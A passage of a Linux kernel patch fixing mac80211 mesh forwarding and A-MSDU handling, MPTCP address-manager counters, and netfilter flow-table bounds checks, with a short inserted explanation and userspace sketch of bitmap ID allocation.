+ 	__u32 fwded_frames;		/* Mesh total forwarded frames */
+ 	__u32 dropped_frames_ttl;	/* Not transmitted since mesh_ttl == 0*/
+ 	__u32 dropped_frames_no_route;	/* Not transmitted, no route found */
+-	__u32 dropped_frames_congestion;/* Not forwarded due to congestion */
+ };
+ 
+ #define PREQ_Q_F_START		0x1
+diff --git a/net/mac80211/iface.c b/net/mac80211/iface.c
+index e00e1bf0f754a..6a9d81e9069c9 100644
+--- a/net/mac80211/iface.c
++++ b/net/mac80211/iface.c
+@@ -251,9 +251,9 @@ static int ieee80211_can_powered_addr_change(struct ieee80211_sub_if_data *sdata
+ 	return ret;
+ }
+ 
+-static int ieee80211_change_mac(struct net_device *dev, void *addr)
++static int _ieee80211_change_mac(struct ieee80211_sub_if_data *sdata,
++				 void *addr)
+ {
+-	struct ieee80211_sub_if_data *sdata = IEEE80211_DEV_TO_SUB_IF(dev);
+ 	struct ieee80211_local *local = sdata->local;
+ 	struct sockaddr *sa = addr;
+ 	bool check_dup = true;
+@@ -278,7 +278,7 @@ static int ieee80211_change_mac(struct net_device *dev, void *addr)
+ 
+ 	if (live)
+ 		drv_remove_interface(local, sdata);
+-	ret = eth_mac_addr(dev, sa);
++	ret = eth_mac_addr(sdata->dev, sa);
+ 
+ 	if (ret == 0) {
+ 		memcpy(sdata->vif.addr, sa->sa_data, ETH_ALEN);
+@@ -294,6 +294,27 @@ static int ieee80211_change_mac(struct net_device *dev, void *addr)
+ 	return ret;
+ }
+ 
++static int ieee80211_change_mac(struct net_device *dev, void *addr)
++{
++	struct ieee80211_sub_if_data *sdata = IEEE80211_DEV_TO_SUB_IF(dev);
++	struct ieee80211_local *local = sdata->local;
++	int ret;
++
++	/*
++	 * This can happen during unregistration if there's a bond device
++	 * active (and possibly in other cases) and we must get removed from
++	 * it. Once the netdev is no longer registered, there is nothing to do.
++	 */
++	if (!dev->ieee80211_ptr->registered)
++		return 0;
++
++	wiphy_lock(local->hw.wiphy);
++	ret = _ieee80211_change_mac(sdata, addr);
++	wiphy_unlock(local->hw.wiphy);
++
++	return ret;
++}
++
+ static inline int identical_mac_addr_allowed(int type1, int type2)
+ {
+ 	return type1 == NL80211_IFTYPE_MONITOR ||
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index c4c80037df91d..b6077a97af1dc 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -2408,7 +2408,6 @@ static int ieee80211_802_1x_port_control(struct ieee80211_rx_data *rx)
+ 
+ static int ieee80211_drop_unencrypted(struct ieee80211_rx_data *rx, __le16 fc)
+ {
+-	struct ieee80211_hdr *hdr = (void *)rx->skb->data;
+ 	struct sk_buff *skb = rx->skb;
+ 	struct ieee80211_rx_status *status = IEEE80211_SKB_RXCB(skb);
+ 
+@@ -2419,31 +2418,6 @@ static int ieee80211_drop_unencrypted(struct ieee80211_rx_data *rx, __le16 fc)
+ 	if (status->flag & RX_FLAG_DECRYPTED)
+ 		return 0;
+ 
+-	/* check mesh EAPOL frames first */
+-	if (unlikely(rx->sta && ieee80211_vif_is_mesh(&rx->sdata->vif) &&
+-		     ieee80211_is_data(fc))) {
+-		struct ieee80211s_hdr *mesh_hdr;
+-		u16 hdr_len = ieee80211_hdrlen(fc);
+-		u16 ethertype_offset;
+-		__be16 ethertype;
+-
+-		if (!ether_addr_equal(hdr->addr1, rx->sdata->vif.addr))
+-			goto drop_check;
+-
+-		/* make sure fixed part of mesh header is there, also checks skb len */
+-		if (!pskb_may_pull(rx->skb, hdr_len + 6))
+-			goto drop_check;
+-
+-		mesh_hdr = (struct ieee80211s_hdr *)(skb->data + hdr_len);
+-		ethertype_offset = hdr_len + ieee80211_get_mesh_hdrlen(mesh_hdr) +
+-				   sizeof(rfc1042_header);
+-
+-		if (skb_copy_bits(rx->skb, ethertype_offset, &ethertype, 2) == 0 &&
+-		    ethertype == rx->sdata->control_port_protocol)
+-			return 0;
+-	}
+-
+-drop_check:
+ 	/* Drop unencrypted frames if key is set. */
+ 	if (unlikely(!ieee80211_has_protected(fc) &&
+ 		     !ieee80211_is_any_nullfunc(fc) &&
+@@ -2751,6 +2725,177 @@ ieee80211_deliver_skb(struct ieee80211_rx_data *rx)
+ 	}
+ }
+ 
++static ieee80211_rx_result
++ieee80211_rx_mesh_data(struct ieee80211_sub_if_data *sdata, struct sta_info *sta,
++		       struct sk_buff *skb)
++{
++#ifdef CONFIG_MAC80211_MESH
++	struct ieee80211_if_mesh *ifmsh = &sdata->u.mesh;
++	struct ieee80211_local *local = sdata->local;
++	uint16_t fc = IEEE80211_FTYPE_DATA | IEEE80211_STYPE_QOS_DATA;
++	struct ieee80211_hdr hdr = {
++		.frame_control = cpu_to_le16(fc)
++	};
++	struct ieee80211_hdr *fwd_hdr;
++	struct ieee80211s_hdr *mesh_hdr;
++	struct ieee80211_tx_info *info;
++	struct sk_buff *fwd_skb;
++	struct ethhdr *eth;
++	bool multicast;
++	int tailroom = 0;
++	int hdrlen, mesh_hdrlen;
++	u8 *qos;
++
++	if (!ieee80211_vif_is_mesh(&sdata->vif))
++		return RX_CONTINUE;
++
++	if (!pskb_may_pull(skb, sizeof(*eth) + 6))
++		return RX_DROP_MONITOR;
++
++	mesh_hdr = (struct ieee80211s_hdr *)(skb->data + sizeof(*eth));
++	mesh_hdrlen = ieee80211_get_mesh_hdrlen(mesh_hdr);
++
++	if (!pskb_may_pull(skb, sizeof(*eth) + mesh_hdrlen))
++		return RX_DROP_MONITOR;
++
++	eth = (struct ethhdr *)skb->data;
++	multicast = is_multicast_ether_addr(eth->h_dest);
++
++	mesh_hdr = (struct ieee80211s_hdr *)(eth + 1);
++	if (!mesh_hdr->ttl)
++		return RX_DROP_MONITOR;
++
++	/* frame is in RMC, don't forward */
++	if (is_multicast_ether_addr(eth->h_dest) &&
++	    mesh_rmc_check(sdata, eth->h_source, mesh_hdr))
++		return RX_DROP_MONITOR;
++
++	/* forward packet */
++	if (sdata->crypto_tx_tailroom_needed_cnt)
++		tailroom = IEEE80211_ENCRYPT_TAILROOM;
++
++	if (mesh_hdr->flags & MESH_FLAGS_AE) {
++		struct mesh_path *mppath;
++		char *proxied_addr;
++
++		if (multicast)
++			proxied_addr = mesh_hdr->eaddr1;
++		else if ((mesh_hdr->flags & MESH_FLAGS_AE) == MESH_FLAGS_AE_A5_A6)
++			/* has_a4 already checked in ieee80211_rx_mesh_check */
++			proxied_addr = mesh_hdr->eaddr2;
++		else
++			return RX_DROP_MONITOR;
++
++		rcu_read_lock();
++		mppath = mpp_path_lookup(sdata, proxied_addr);
++		if (!mppath) {
++			mpp_path_add(sdata, proxied_addr, eth->h_source);
++		} else {
++			spin_lock_bh(&mppath->state_lock);
++			if (!ether_addr_equal(mppath->mpp, eth->h_source))
++				memcpy(mppath->mpp, eth->h_source, ETH_ALEN);
++			mppath->exp_time = jiffies;
++			spin_unlock_bh(&mppath->state_lock);
++		}
++		rcu_read_unlock();
++	}
++
++	/* Frame has reached destination.  Don't forward */
++	if (ether_addr_equal(sdata->vif.addr, eth->h_dest))
++		goto rx_accept;
++
++	if (!--mesh_hdr->ttl) {
++		if (multicast)
++			goto rx_accept;
++
++		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, dropped_frames_ttl);
++		return RX_DROP_MONITOR;
++	}
++
++	if (!ifmsh->mshcfg.dot11MeshForwarding) {
++		if (is_multicast_ether_addr(eth->h_dest))
++			goto rx_accept;
++
++		return RX_DROP_MONITOR;
++	}
++
++	skb_set_queue_mapping(skb, ieee802_1d_to_ac[skb->priority]);
++
++	ieee80211_fill_mesh_addresses(&hdr, &hdr.frame_control,
++				      eth->h_dest, eth->h_source);
++	hdrlen = ieee80211_hdrlen(hdr.frame_control);
++	if (multicast) {
++		int extra_head = sizeof(struct ieee80211_hdr) - sizeof(*eth);
++
++		fwd_skb = skb_copy_expand(skb, local->tx_headroom + extra_head +
++					       IEEE80211_ENCRYPT_HEADROOM,
++					  tailroom, GFP_ATOMIC);
++		if (!fwd_skb)
++			goto rx_accept;
++	} else {
++		fwd_skb = skb;
++		skb = NULL;
++
++		if (skb_cow_head(fwd_skb, hdrlen - sizeof(struct ethhdr)))
++			return RX_DROP_UNUSABLE;
++
++		if (skb_linearize(fwd_skb))
++			return RX_DROP_UNUSABLE;
++	}
++
++	fwd_hdr = skb_push(fwd_skb, hdrlen - sizeof(struct ethhdr));
++	memcpy(fwd_hdr, &hdr, hdrlen - 2);
++	qos = ieee80211_get_qos_ctl(fwd_hdr);
++	qos[0] = qos[1] = 0;
++
++	skb_reset_mac_header(fwd_skb);
++	hdrlen += mesh_hdrlen;
++	if (ieee80211_get_8023_tunnel_proto(fwd_skb->data + hdrlen,
++					    &fwd_skb->protocol))
++		hdrlen += ETH_ALEN;
++	else
++		fwd_skb->protocol = htons(fwd_skb->len - hdrlen);
++	skb_set_network_header(fwd_skb, hdrlen + 2);
++
++	info = IEEE80211_SKB_CB(fwd_skb);
++	memset(info, 0, sizeof(*info));
++	info->control.flags |= IEEE80211_TX_INTCFL_NEED_TXPROCESSING;
++	info->control.vif = &sdata->vif;
++	info->control.jiffies = jiffies;
++	if (multicast) {
++		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, fwded_mcast);
++		memcpy(fwd_hdr->addr2, sdata->vif.addr, ETH_ALEN);
++		/* update power mode indication when forwarding */
++		ieee80211_mps_set_frame_flags(sdata, NULL, fwd_hdr);
++	} else if (!mesh_nexthop_lookup(sdata, fwd_skb)) {
++		/* mesh power mode flags updated in mesh_nexthop_lookup */
++		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, fwded_unicast);
++	} else {
++		/* unable to resolve next hop */
++		if (sta)
++			mesh_path_error_tx(sdata, ifmsh->mshcfg.element_ttl,
++					   hdr.addr3, 0,
++					   WLAN_REASON_MESH_PATH_NOFORWARD,
++					   sta->sta.addr);
++		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, dropped_frames_no_route);
++		kfree_skb(fwd_skb);
++		goto rx_accept;
++	}
++
++	IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, fwded_frames);
++	fwd_skb->dev = sdata->dev;
++	ieee80211_add_pending_skb(local, fwd_skb);
++
++rx_accept:
++	if (!skb)
++		return RX_QUEUED;
++
++	ieee80211_strip_8023_mesh_hdr(skb);
++#endif
++
++	return RX_CONTINUE;
++}
++
+ static ieee80211_rx_result debug_noinline
+ __ieee80211_rx_h_amsdu(struct ieee80211_rx_data *rx, u8 data_offset)
+ {
+@@ -2759,6 +2904,7 @@ __ieee80211_rx_h_amsdu(struct ieee80211_rx_data *rx, u8 data_offset)
+ 	struct ieee80211_hdr *hdr = (struct ieee80211_hdr *)skb->data;
+ 	__le16 fc = hdr->frame_control;
+ 	struct sk_buff_head frame_list;
++	ieee80211_rx_result res;
+ 	struct ethhdr ethhdr;
+ 	const u8 *check_da = ethhdr.h_dest, *check_sa = ethhdr.h_source;
+ 
+@@ -2777,6 +2923,7 @@ __ieee80211_rx_h_amsdu(struct ieee80211_rx_data *rx, u8 data_offset)
+ 			break;
+ 		case NL80211_IFTYPE_MESH_POINT:
+ 			check_sa = NULL;
++			check_da = NULL;
+ 			break;
+ 		default:
+ 			break;
+@@ -2791,20 +2938,43 @@ __ieee80211_rx_h_amsdu(struct ieee80211_rx_data *rx, u8 data_offset)
+ 					  data_offset, true))
+ 		return RX_DROP_UNUSABLE;
+ 
++	if (rx->sta->amsdu_mesh_control < 0) {
++		bool valid_std = ieee80211_is_valid_amsdu(skb, true);
++		bool valid_nonstd = ieee80211_is_valid_amsdu(skb, false);
++
++		if (valid_std && !valid_nonstd)
++			rx->sta->amsdu_mesh_control = 1;
++		else if (valid_nonstd && !valid_std)
++			rx->sta->amsdu_mesh_control = 0;
++	}
++
+ 	ieee80211_amsdu_to_8023s(skb, &frame_list, dev->dev_addr,
+ 				 rx->sdata->vif.type,
+ 				 rx->local->hw.extra_tx_headroom,
+-				 check_da, check_sa);
++				 check_da, check_sa,
++				 rx->sta->amsdu_mesh_control);
+ 
+ 	while (!skb_queue_empty(&frame_list)) {
+ 		rx->skb = __skb_dequeue(&frame_list);
+ 
+-		if (!ieee80211_frame_allowed(rx, fc)) {
+-			dev_kfree_skb(rx->skb);
++		res = ieee80211_rx_mesh_data(rx->sdata, rx->sta, rx->skb);
++		switch (res) {
++		case RX_QUEUED:
+ 			continue;
++		case RX_CONTINUE:
++			break;
++		default:
++			goto free;
+ 		}
+ 
++		if (!ieee80211_frame_allowed(rx, fc))
++			goto free;
++
+ 		ieee80211_deliver_skb(rx);
++		continue;
++
++free:
++		dev_kfree_skb(rx->skb);
+ 	}
+ 
+ 	return RX_QUEUED;
+@@ -2837,12 +3007,14 @@ ieee80211_rx_h_amsdu(struct ieee80211_rx_data *rx)
+ 			if (!rx->sdata->u.mgd.use_4addr)
+ 				return RX_DROP_UNUSABLE;
+ 			break;
++		case NL80211_IFTYPE_MESH_POINT:
++			break;
+ 		default:
+ 			return RX_DROP_UNUSABLE;
+ 		}
+ 	}
+ 
+-	if (is_multicast_ether_addr(hdr->addr1))
++	if (is_multicast_ether_addr(hdr->addr1) || !rx->sta)
+ 		return RX_DROP_UNUSABLE;
+ 
+ 	if (rx->key) {
+@@ -2865,152 +3037,6 @@ ieee80211_rx_h_amsdu(struct ieee80211_rx_data *rx)
+ 	return __ieee80211_rx_h_amsdu(rx, 0);
+ }
+ 
+-#ifdef CONFIG_MAC80211_MESH
+-static ieee80211_rx_result
+-ieee80211_rx_h_mesh_fwding(struct ieee80211_rx_data *rx)
+-{
+-	struct ieee80211_hdr *fwd_hdr, *hdr;
+-	struct ieee80211_tx_info *info;
+-	struct ieee80211s_hdr *mesh_hdr;
+-	struct sk_buff *skb = rx->skb, *fwd_skb;
+-	struct ieee80211_local *local = rx->local;
+-	struct ieee80211_sub_if_data *sdata = rx->sdata;
+-	struct ieee80211_if_mesh *ifmsh = &sdata->u.mesh;
+-	u16 ac, q, hdrlen;
+-	int tailroom = 0;
+-
+-	hdr = (struct ieee80211_hdr *) skb->data;
+-	hdrlen = ieee80211_hdrlen(hdr->frame_control);
+-
+-	/* make sure fixed part of mesh header is there, also checks skb len */
+-	if (!pskb_may_pull(rx->skb, hdrlen + 6))
+-		return RX_DROP_MONITOR;
+-
+-	mesh_hdr = (struct ieee80211s_hdr *) (skb->data + hdrlen);
+-
+-	/* make sure full mesh header is there, also checks skb len */
+-	if (!pskb_may_pull(rx->skb,
+-			   hdrlen + ieee80211_get_mesh_hdrlen(mesh_hdr)))
+-		return RX_DROP_MONITOR;
+-
+-	/* reload pointers */
+-	hdr = (struct ieee80211_hdr *) skb->data;
+-	mesh_hdr = (struct ieee80211s_hdr *) (skb->data + hdrlen);
+-
+-	if (ieee80211_drop_unencrypted(rx, hdr->frame_control))
+-		return RX_DROP_MONITOR;
+-
+-	/* frame is in RMC, don't forward */
+-	if (ieee80211_is_data(hdr->frame_control) &&
+-	    is_multicast_ether_addr(hdr->addr1) &&
+-	    mesh_rmc_check(rx->sdata, hdr->addr3, mesh_hdr))
+-		return RX_DROP_MONITOR;
+-
+-	if (!ieee80211_is_data(hdr->frame_control))
+-		return RX_CONTINUE;
+-
+-	if (!mesh_hdr->ttl)
+-		return RX_DROP_MONITOR;
+-
+-	if (mesh_hdr->flags & MESH_FLAGS_AE) {
+-		struct mesh_path *mppath;
+-		char *proxied_addr;
+-		char *mpp_addr;
+-
+-		if (is_multicast_ether_addr(hdr->addr1)) {
+-			mpp_addr = hdr->addr3;
+-			proxied_addr = mesh_hdr->eaddr1;
+-		} else if ((mesh_hdr->flags & MESH_FLAGS_AE) ==
+-			    MESH_FLAGS_AE_A5_A6) {
+-			/* has_a4 already checked in ieee80211_rx_mesh_check */
+-			mpp_addr = hdr->addr4;
+-			proxied_addr = mesh_hdr->eaddr2;
+-		} else {
+-			return RX_DROP_MONITOR;
+-		}
+-
+-		rcu_read_lock();
+-		mppath = mpp_path_lookup(sdata, proxied_addr);
+-		if (!mppath) {
+-			mpp_path_add(sdata, proxied_addr, mpp_addr);
+-		} else {
+-			spin_lock_bh(&mppath->state_lock);
+-			if (!ether_addr_equal(mppath->mpp, mpp_addr))
+-				memcpy(mppath->mpp, mpp_addr, ETH_ALEN);
+-			mppath->exp_time = jiffies;
+-			spin_unlock_bh(&mppath->state_lock);
+-		}
+-		rcu_read_unlock();
+-	}
+-
+-	/* Frame has reached destination.  Don't forward */
+-	if (!is_multicast_ether_addr(hdr->addr1) &&
+-	    ether_addr_equal(sdata->vif.addr, hdr->addr3))
+-		return RX_CONTINUE;
+-
+-	ac = ieee802_1d_to_ac[skb->priority];
+-	q = sdata->vif.hw_queue[ac];
+-	if (ieee80211_queue_stopped(&local->hw, q)) {
+-		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, dropped_frames_congestion);
+-		return RX_DROP_MONITOR;
+-	}
+-	skb_set_queue_mapping(skb, ac);
+-
+-	if (!--mesh_hdr->ttl) {
+-		if (!is_multicast_ether_addr(hdr->addr1))
+-			IEEE80211_IFSTA_MESH_CTR_INC(ifmsh,
+-						     dropped_frames_ttl);
+-		goto out;
+-	}
+-
+-	if (!ifmsh->mshcfg.dot11MeshForwarding)
+-		goto out;
+-
+-	if (sdata->crypto_tx_tailroom_needed_cnt)
+-		tailroom = IEEE80211_ENCRYPT_TAILROOM;
+-
+-	fwd_skb = skb_copy_expand(skb, local->tx_headroom +
+-				       IEEE80211_ENCRYPT_HEADROOM,
+-				  tailroom, GFP_ATOMIC);
+-	if (!fwd_skb)
+-		goto out;
+-
+-	fwd_skb->dev = sdata->dev;
+-	fwd_hdr =  (struct ieee80211_hdr *) fwd_skb->data;
+-	fwd_hdr->frame_control &= ~cpu_to_le16(IEEE80211_FCTL_RETRY);
+-	info = IEEE80211_SKB_CB(fwd_skb);
+-	memset(info, 0, sizeof(*info));
+-	info->control.flags |= IEEE80211_TX_INTCFL_NEED_TXPROCESSING;
+-	info->control.vif = &rx->sdata->vif;
+-	info->control.jiffies = jiffies;
+-	if (is_multicast_ether_addr(fwd_hdr->addr1)) {
+-		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, fwded_mcast);
+-		memcpy(fwd_hdr->addr2, sdata->vif.addr, ETH_ALEN);
+-		/* update power mode indication when forwarding */
+-		ieee80211_mps_set_frame_flags(sdata, NULL, fwd_hdr);
+-	} else if (!mesh_nexthop_lookup(sdata, fwd_skb)) {
+-		/* mesh power mode flags updated in mesh_nexthop_lookup */
+-		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, fwded_unicast);
+-	} else {
+-		/* unable to resolve next hop */
+-		mesh_path_error_tx(sdata, ifmsh->mshcfg.element_ttl,
+-				   fwd_hdr->addr3, 0,
+-				   WLAN_REASON_MESH_PATH_NOFORWARD,
+-				   fwd_hdr->addr2);
+-		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, dropped_frames_no_route);
+-		kfree_skb(fwd_skb);
+-		return RX_DROP_MONITOR;
+-	}
+-
+-	IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, fwded_frames);
+-	ieee80211_add_pending_skb(local, fwd_skb);
+- out:
+-	if (is_multicast_ether_addr(hdr->addr1))
+-		return RX_CONTINUE;
+-	return RX_DROP_MONITOR;
+-}
+-#endif
+-
+ static ieee80211_rx_result debug_noinline
+ ieee80211_rx_h_data(struct ieee80211_rx_data *rx)
+ {
+@@ -3019,6 +3045,7 @@ ieee80211_rx_h_data(struct ieee80211_rx_data *rx)
+ 	struct net_device *dev = sdata->dev;
+ 	struct ieee80211_hdr *hdr = (struct ieee80211_hdr *)rx->skb->data;
+ 	__le16 fc = hdr->frame_control;
++	ieee80211_rx_result res;
+ 	bool port_control;
+ 	int err;
+ 
+@@ -3045,6 +3072,10 @@ ieee80211_rx_h_data(struct ieee80211_rx_data *rx)
+ 	if (unlikely(err))
+ 		return RX_DROP_UNUSABLE;
+ 
++	res = ieee80211_rx_mesh_data(rx->sdata, rx->sta, rx->skb);
++	if (res != RX_CONTINUE)
++		return res;
++
+ 	if (!ieee80211_frame_allowed(rx, fc))
+ 		return RX_DROP_MONITOR;
+ 
+@@ -4019,10 +4050,6 @@ static void ieee80211_rx_handlers(struct ieee80211_rx_data *rx,
+ 		CALL_RXH(ieee80211_rx_h_defragment);
+ 		CALL_RXH(ieee80211_rx_h_michael_mic_verify);
+ 		/* must be after MMIC verify so header is counted in MPDU mic */
+-#ifdef CONFIG_MAC80211_MESH
+-		if (ieee80211_vif_is_mesh(&rx->sdata->vif))
+-			CALL_RXH(ieee80211_rx_h_mesh_fwding);
+-#endif
+ 		CALL_RXH(ieee80211_rx_h_amsdu);
+ 		CALL_RXH(ieee80211_rx_h_data);
+ 
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index f388b39531748..dd1864f6549f2 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -594,6 +594,9 @@ __sta_info_alloc(struct ieee80211_sub_if_data *sdata,
+ 
+ 	sta->sta_state = IEEE80211_STA_NONE;
+ 
++	if (sdata->vif.type == NL80211_IFTYPE_MESH_POINT)
++		sta->amsdu_mesh_control = -1;
++
+ 	/* Mark TID as unreserved */
+ 	sta->reserved_tid = IEEE80211_TID_UNRESERVED;
+ 
+@@ -1269,6 +1272,20 @@ static void __sta_info_destroy_part2(struct sta_info *sta)
+ 	 *	 after _part1 and before _part2!
+ 	 */
+ 
++	/*
++	 * There's a potential race in _part1 where we set WLAN_STA_BLOCK_BA
++	 * but someone might have just gotten past a check, and not yet into
++	 * queuing the work/creating the data/etc.
++	 *
++	 * Do another round of destruction so that the worker is certainly
++	 * canceled before we later free the station.
++	 *
++	 * Since this is after synchronize_rcu()/synchronize_net() we're now
++	 * certain that nobody can actually hold a reference to the STA and
++	 * be calling e.g. ieee80211_start_tx_ba_session().
++	 */
++	ieee80211_sta_tear_down_BA_sessions(sta, AGG_STOP_DESTROY_STA);
++
+ 	might_sleep();
+ 	lockdep_assert_held(&local->sta_mtx);
+ 
+diff --git a/net/mac80211/sta_info.h b/net/mac80211/sta_info.h
+index 4809756a43dd1..09db542fd2021 100644
+--- a/net/mac80211/sta_info.h
++++ b/net/mac80211/sta_info.h
+@@ -621,6 +621,8 @@ struct link_sta_info {
+  *	taken from HT/VHT capabilities or VHT operating mode notification
+  * @cparams: CoDel parameters for this station.
+  * @reserved_tid: reserved TID (if any, otherwise IEEE80211_TID_UNRESERVED)
++ * @amsdu_mesh_control: track the mesh A-MSDU format used by the peer
++ *	(-1: not yet known, 0: non-standard [without mesh header], 1: standard)
+  * @fast_tx: TX fastpath information
+  * @fast_rx: RX fastpath information
+  * @tdls_chandef: a TDLS peer can have a wider chandef that is compatible to
+@@ -706,6 +708,7 @@ struct sta_info {
+ 	struct codel_params cparams;
+ 
+ 	u8 reserved_tid;
++	s8 amsdu_mesh_control;
+ 
+ 	struct cfg80211_chan_def tdls_chandef;
+ 
+diff --git a/net/mctp/test/route-test.c b/net/mctp/test/route-test.c
+index 92ea4158f7fc4..a944490a724d3 100644
+--- a/net/mctp/test/route-test.c
++++ b/net/mctp/test/route-test.c
+@@ -354,7 +354,7 @@ static void mctp_test_route_input_sk(struct kunit *test)
+ 
+ 		skb2 = skb_recv_datagram(sock->sk, MSG_DONTWAIT, &rc);
+ 		KUNIT_EXPECT_NOT_ERR_OR_NULL(test, skb2);
+-		KUNIT_EXPECT_EQ(test, skb->len, 1);
++		KUNIT_EXPECT_EQ(test, skb2->len, 1);
+ 
+ 		skb_free_datagram(sock->sk, skb2);
+ 
+diff --git a/net/mptcp/diag.c b/net/mptcp/diag.c
+index 7017dd60659dc..b2199cc282384 100644
+--- a/net/mptcp/diag.c
++++ b/net/mptcp/diag.c
+@@ -95,7 +95,7 @@ static size_t subflow_get_info_size(const struct sock *sk)
+ 		nla_total_size(4) +	/* MPTCP_SUBFLOW_ATTR_RELWRITE_SEQ */
+ 		nla_total_size_64bit(8) +	/* MPTCP_SUBFLOW_ATTR_MAP_SEQ */
+ 		nla_total_size(4) +	/* MPTCP_SUBFLOW_ATTR_MAP_SFSEQ */
+-		nla_total_size(2) +	/* MPTCP_SUBFLOW_ATTR_SSN_OFFSET */
++		nla_total_size(4) +	/* MPTCP_SUBFLOW_ATTR_SSN_OFFSET */
+ 		nla_total_size(2) +	/* MPTCP_SUBFLOW_ATTR_MAP_DATALEN */
+ 		nla_total_size(4) +	/* MPTCP_SUBFLOW_ATTR_FLAGS */
+ 		nla_total_size(1) +	/* MPTCP_SUBFLOW_ATTR_ID_REM */
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 368886d3faac6..2bce3a32bd881 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -834,7 +834,7 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 			mptcp_close_ssk(sk, ssk, subflow);
+ 			spin_lock_bh(&msk->pm.lock);
+ 
+-			removed = true;
++			removed |= subflow->request_join;
+ 			if (rm_type == MPTCP_MIB_RMSUBFLOW)
+ 				__MPTCP_INC_STATS(sock_net(sk), rm_type);
+ 		}
+@@ -848,7 +848,11 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 		if (!mptcp_pm_is_kernel(msk))
+ 			continue;
+ 
+-		if (rm_type == MPTCP_MIB_RMADDR) {
++		if (rm_type == MPTCP_MIB_RMADDR && rm_id &&
++		    !WARN_ON_ONCE(msk->pm.add_addr_accepted == 0)) {
++			/* Note: if the subflow has been closed before, this
++			 * add_addr_accepted counter will not be decremented.
++			 */
+ 			msk->pm.add_addr_accepted--;
+ 			WRITE_ONCE(msk->pm.accept_addr, true);
+ 		} else if (rm_type == MPTCP_MIB_RMSUBFLOW) {
+@@ -1474,7 +1478,10 @@ static bool mptcp_pm_remove_anno_addr(struct mptcp_sock *msk,
+ 	ret = remove_anno_list_by_saddr(msk, addr);
+ 	if (ret || force) {
+ 		spin_lock_bh(&msk->pm.lock);
+-		msk->pm.add_addr_signaled -= ret;
++		if (ret) {
++			__set_bit(addr->id, msk->pm.id_avail_bitmap);
++			msk->pm.add_addr_signaled--;
++		}
+ 		mptcp_pm_remove_addr(msk, &list);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 	}
+@@ -1509,8 +1516,17 @@ static int mptcp_nl_remove_subflow_and_signal_addr(struct net *net,
+ 		remove_subflow = lookup_subflow_by_saddr(&msk->conn_list, addr);
+ 		mptcp_pm_remove_anno_addr(msk, addr, remove_subflow &&
+ 					  !(entry->flags & MPTCP_PM_ADDR_FLAG_IMPLICIT));
+-		if (remove_subflow)
++
++		if (remove_subflow) {
+ 			mptcp_pm_remove_subflow(msk, &list);
++		} else if (entry->flags & MPTCP_PM_ADDR_FLAG_SUBFLOW) {
++			/* If the subflow has been used, but now closed */
++			spin_lock_bh(&msk->pm.lock);
++			if (!__test_and_set_bit(entry->addr.id, msk->pm.id_avail_bitmap))
++				msk->pm.local_addr_used--;
++			spin_unlock_bh(&msk->pm.lock);
++		}
++
+ 		release_sock(sk);
+ 
+ next:
+@@ -1654,8 +1670,15 @@ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 		mptcp_pm_remove_addr(msk, &alist);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 	}
++
+ 	if (slist.nr)
+ 		mptcp_pm_remove_subflow(msk, &slist);
++
++	/* Reset counters: maybe some subflows have been removed before */
++	spin_lock_bh(&msk->pm.lock);
++	bitmap_fill(msk->pm.id_avail_bitmap, MPTCP_PM_MAX_ADDR_ID + 1);
++	msk->pm.local_addr_used = 0;
++	spin_unlock_bh(&msk->pm.lock);
+ }
+ 
+ static void mptcp_nl_remove_addrs_list(struct net *net,
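
The address-manager fixes above all revolve around keeping the counters and
id_avail_bitmap consistent when endpoints go away: a freed ID is marked
available again, and the matching counter is decremented at most once. A
userspace sketch of that allocate/release discipline with a plain bitmap
(names are illustrative, not the MPTCP structures):

#include <stdio.h>

#define MAX_ID 8

static unsigned int id_avail = (1u << MAX_ID) - 1;	/* set bit = free */
static int local_addr_used;

static int id_alloc(void)
{
	for (int id = 0; id < MAX_ID; id++) {
		if (id_avail & (1u << id)) {
			id_avail &= ~(1u << id);
			local_addr_used++;
			return id;
		}
	}
	return -1;
}

static void id_release(int id)
{
	if (!(id_avail & (1u << id))) {	/* release at most once */
		id_avail |= 1u << id;
		local_addr_used--;
	}
}

int main(void)
{
	int id = id_alloc();

	id_release(id);
	id_release(id);			/* double release is harmless */
	printf("used=%d\n", local_addr_used);
	return 0;
}
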
+diff --git a/net/netfilter/nf_flow_table_inet.c b/net/netfilter/nf_flow_table_inet.c
+index 6eef15648b7b0..b0f1991719324 100644
+--- a/net/netfilter/nf_flow_table_inet.c
++++ b/net/netfilter/nf_flow_table_inet.c
+@@ -17,6 +17,9 @@ nf_flow_offload_inet_hook(void *priv, struct sk_buff *skb,
+ 
+ 	switch (skb->protocol) {
+ 	case htons(ETH_P_8021Q):
++		if (!pskb_may_pull(skb, skb_mac_offset(skb) + sizeof(*veth)))
++			return NF_ACCEPT;
++
+ 		veth = (struct vlan_ethhdr *)skb_mac_header(skb);
+ 		proto = veth->h_vlan_encapsulated_proto;
+ 		break;
+diff --git a/net/netfilter/nf_flow_table_ip.c b/net/netfilter/nf_flow_table_ip.c
+index 22bc0e3d8a0b5..34be2c9bc39d8 100644
+--- a/net/netfilter/nf_flow_table_ip.c
++++ b/net/netfilter/nf_flow_table_ip.c
+@@ -275,6 +275,9 @@ static bool nf_flow_skb_encap_protocol(struct sk_buff *skb, __be16 proto,
+ 
+ 	switch (skb->protocol) {
